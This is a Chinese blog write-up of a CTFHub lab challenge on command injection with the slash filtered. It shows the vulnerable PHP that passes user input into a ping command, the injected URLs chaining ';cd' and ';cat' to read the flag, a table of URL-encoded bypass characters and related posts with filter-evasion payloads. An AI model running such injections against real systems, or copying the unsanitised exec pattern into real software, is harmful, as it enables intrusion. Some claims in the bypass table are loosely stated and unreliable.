CTFHub | 过滤目录分隔符

已于 2023-07-22 05:41:13 修改
阅读量1.3k 收藏 5
点赞数 3
分类专栏: CTF精进之路 文章标签: web安全 CTF php
于 2023-07-21 18:39:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/131742799
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

过滤目录分隔符:

        这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗?

网页显示内容

        

        

0x02 解题过程

检查网页源代码发现这题如果用户输入 / \ 就不会执行,说明这题对斜杠做了过滤处理。这里使用 HackBar 进行测试,在 URL 后输入 /ip=127.0.0.1 对本地进行 ping 命令测试,发现可以正常回显。

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

        

在 URL 后加入参数分隔符号,输入 ls 命令进行查看,同样发现一个提示 “ flag 在这” 。说明 flag 可能在这个文件中。

http://challenge-d6bf92a0dd3e5ca9.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls

        

继续使用参数分隔符号先使用 cd 命令打开文件,然后使用参数分隔符号加上 ls 命令查看文件中的内容。发现一个文件 flag_20743606830887.php ,可能含有 flag 。

http://challenge-d6bf92a0dd3e5ca9.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cd flag_is_here;ls

        

将 ls 命令替换成查看命令 cat 查看 flag_20743606830887.php 文件,在网页回显中发现一个空白回显。

http://challenge-d6bf92a0dd3e5ca9.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cd flag_is_here;cat flag_20743606830887.php

        

检查网页源代码,在空白回显对应的源代码中发现此题 flag 。

        

        

0x03 过滤目录分隔符

        过滤目录分隔符是对文件路径中的目录分隔符,如斜杠 / 或反斜杠 \ 过滤或去除。这样做可以避免一些安全问题,比如,路径遍历攻击以及路径注入攻击等。

        

常见的 URL 绕过字符使用方法:

名称字符URL编码利用方法
换行符%0a%0a通过HTTP响应拆分攻击来插入恶意内容,或通过XSS注入恶意脚本
回车符%0d%0d类似于换行符,回车符也可用于HTTP响应拆分攻击和XSS注入攻击。
空格符%20%20通过空字符来欺骗文件上传验证或绕过其他安全控制,导致文件上传漏洞或其他漏洞。
管道符|%7c通过URL中使用管道符来执行SQL注入攻击或命令注入攻击。
逻辑与操作符&&%26%26通过URL中的逻辑与操作符来执行XSS攻击或代码注入攻击。
逻辑或操作符||%7c%7c通过URL中的逻辑或操作符来执行XSS攻击或SQL注入攻击。
小于号<%3c通过URL中的小于号来执行XSS攻击,注入恶意脚本。
大于号>%3e通过URL中的大于号来执行XSS攻击,注入恶意脚本。
双引号"%22通过URL中的双引号来执行XSS攻击,注入恶意脚本。
单引号

'

%27通过URL中的单引号来执行SQL注入攻击,注入恶意SQL语句。
反斜杠\%5c通过URL中的反斜杠来执行代码注入攻击。
正斜杠/%2f通过URL中的正斜杠来执行路径遍历攻击。
路径分隔符;%3b用于分割路径,同时也可以用于注入恶意代码,比如SQL注入攻击。
查询符号?%3f通过URL中的查询符号来执行SQL注入攻击。

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
专栏目录
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2221
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
CTFhub RCE 命令注入部分
qq_41497476的博客
07-01 1263
这种题其实已经比较熟悉了,使用 |,&&,;等分隔符对前面ping的内容进行隔断,然后执行自己的命令 任意值;ls 发现了除了目录下除了index.php外还有另一个php文件 输入 127.0.0.0;cat 21701615624125.php 发现确实多了个反馈的参数,但是看不到值,很疑惑后面知道了,这是因为cat命令反馈的值无法直接显示 这时有两个方法,一是直接查看源码 源码里是能看到的 第二个方法是直接把命令改为 127.0.0.1;cat 27712282015742.php.
CTFHub技能树web(持续更新)--RCE--命令注入--过滤目录分隔符
jiuyongpinyin的博客
01-26 1168
过滤目录分隔符 首先我们依然是ls查看当前目录: 发现这里没有后缀了,再根据题目的提示,这就是个文件,我们需要进去,但是目录分隔符过滤了,那么 ls …/ 这种命令就不能用了,那么我们先使用反斜杠查看这个文件夹里面的东东: 127.0.0.1 & ls \flag_is_here 看到了这个文件,然后我们应该如何查看呢,我们可以使用分号将命令同时执行,那么我们就是进入文件夹,读取文件: 127.0.0.1 & cd flag_is_here;cat flag_18147299093
ctfhub-过滤目录分隔符
m0_62094846的博客
12-15 4157
没有后缀,说明是个文件,正常情况下可以直接用cat+路径,用目录分隔符代替 但是这道题目录分隔符过滤了,也查不到可以代替的字符(不过也不需要) 可以进入这个文件夹再打开文件,就用cd 127.0.0.1&cd flag_is_here;ls 不知道为啥查看文件只能用&了用|出不来 看到了文件,就可以读取了 127.0.0.1&cd flag_is_here;cat flag_198702009428781.php 注:如果后面加base64编...
CTF】绕过关键字的方法
最新发布
star3119391396的博客
08-20 307
前言:在CTF比赛中,常常会遇到一些关键字或者某个词被匹配过滤,就需要用其他的方法进行绕过,在此记录以下。还有一些比如异或绕过,取反执行,短标签,url编码绕过等等。base64编码绕过。
CTFHub命令注入过滤目录分隔符
manerzi的博客
10-26 725
CTFHub命令注入过滤目录分隔符
CTFHub技能书解题笔记-RCE-过滤空格、过滤目录分隔符过滤运算符
qq_43006864的博客
04-01 4245
一、过滤空格 过滤了空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
CTFHub_技能树_Web之RCE——“过滤目录分隔符
Ho1aAs‘s Blog
07-28 1381
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 127.0.0.1&ls查看当前目录结构 flag需要跳转到子文件夹里 而目录分隔符斜杠被过滤了 因此我们使用cd进入子文件夹,而不是直接cat访问 输入127.0.0.1;cd flag_is_here;ls进入子文件夹并查询,使用分号间隔 127.0.0.1;cd flag_is_here;cat flag_xxx.php访问得到FLAG,位
CTFHUB-web-RCE-过滤目录分隔符
weixin_68416970的博客
08-07 152
从源码发现管道符被过滤,使用分号;分隔符,拼接执行注入,发现了 flag 的可疑文件。查看 flag_is_here,发现有一个flag_12069946857.php。查看flag_12069946857.php,右键查看页面源代码,发现了 flag。
CTFHub技能树笔记之RCE:过滤目录分隔符过滤运算符、综合过滤练习
weixin_48799157的博客
03-29 2661
小白一个,记录解题过程,如有错误请指正! 一、过滤目录分隔符 1.查看当前目录 2.有提示,进去看一下 127.0.0.1;ls flag_is_here 3.根据经验知道我们只要访问到php文件的内容就可以拿到flag了 思路:这里我们可以用&&运算符将命令连接起来就能成功拿到flag 127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64 二、过...
通过ctfhub系统对RCE学习
qq_45584159的博客
12-29 1169
文章目录RCE介绍exce(ping)(远程系统命令执行)一. eval执行函数linux常用的目录操作命令:创建目录:mkdir建空文本文件:touch复制文件:cp移动文件或目录:mv查看文件内容命令:cat删除文件:rm命令注入 RCE介绍 RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7258
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub远程执行RCE
m0_57379855的博客
03-17 1291
CTFHub远程执行RCEeval执行命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习文件包含php://input远程包含读取源代码 eval执行 命令注入 127.0.0.1;cat 121931294031970.php 127.0.0.1;cat 121931294031970.php|base64 获得flag 过滤cat 其他查看文件的命令 127.0.0.1;ls 127.0.0.1;less flag_198392751413959.php|base
CTFhub-RCE-过滤目录分隔符 /
ssss39的博客
11-17 374
1. 查看当前目录 127.00.1;根据源代码信息可知,过滤掉了/
命令注入————ctfhub过滤cat、空格、目录分隔符、运算符、综合过滤练习)
qq_45655564的博客
05-30 9615
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFHUB web-rce-过滤
2301_79783285的博客
12-18 717
回车键,即键盘上的ENTER键,是一个比较有用的键,在文字编辑时,回车键的作用是换行,在输入网址时回车键的作用是“转到”,在执行DOS命令时,回车键的作用是执行。
CTFHub | 综合过滤练习
尼泊罗河伯的博客
09-11 543
检查网页源代码发现这次网页对 | 、&& 、 || 、 \ 、 / 、; ,都进行了过滤处理。在之前的文章有对一些常见的 URL 绕过字符使用方法做一个简单的总结。这里先输入本地 IP 进行 ping 命令测试,发现可以正常回显。
ctf笔记
qq_51796436的博客
10-24 416
文件上传黑名单过滤ph或者白名单图片则只能寻求配置文件,如.htaccess和.user,ini。
从一道CTF的非预期解看PHP反斜杠匹配问题
Je3Z的博客
07-23 494
主要是记录一下这个,然后题是 国赛华南半决赛的Magicchar <?php error_reporting(0); include'flag.php'; function Magic($str){ for($i=0; $i<=strlen($str)-1; $i++) { if ((ord($str[$i])<32) or (ord($str[$i])>126)) { die('sorry'); exit; } } $bl
使用‘||’作为分隔符,要注意什么
06-03
使用'||'作为字段分隔符时,需要注意以下几点: 1. 在创建表时需要使用 `ROW FORMAT DELIMITED` 语句来指定使用的分隔符,如下所示: ``` ROW FORMAT DELIMITED FIELDS TERMINATED BY '||' ``` 2. 在数据文件中,每行数据的最后一个字段后不能带有分隔符,否则会将其识别为一个额外的空字段。 3. 如果数据中包含了分隔符,需要使用转义字符进行处理,否则会导致读取数据时出错。 4. 在查询表时,需要使用 `SELECT` 语句,同时通过 `SET hive.cli.print.header=true;` 命令来显示表头信息,否则可能无法正确显示字段名。 总之,使用'||'作为字段分隔符时,需要注意数据文件的格式和内容,以及在查询表时的一些细节。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值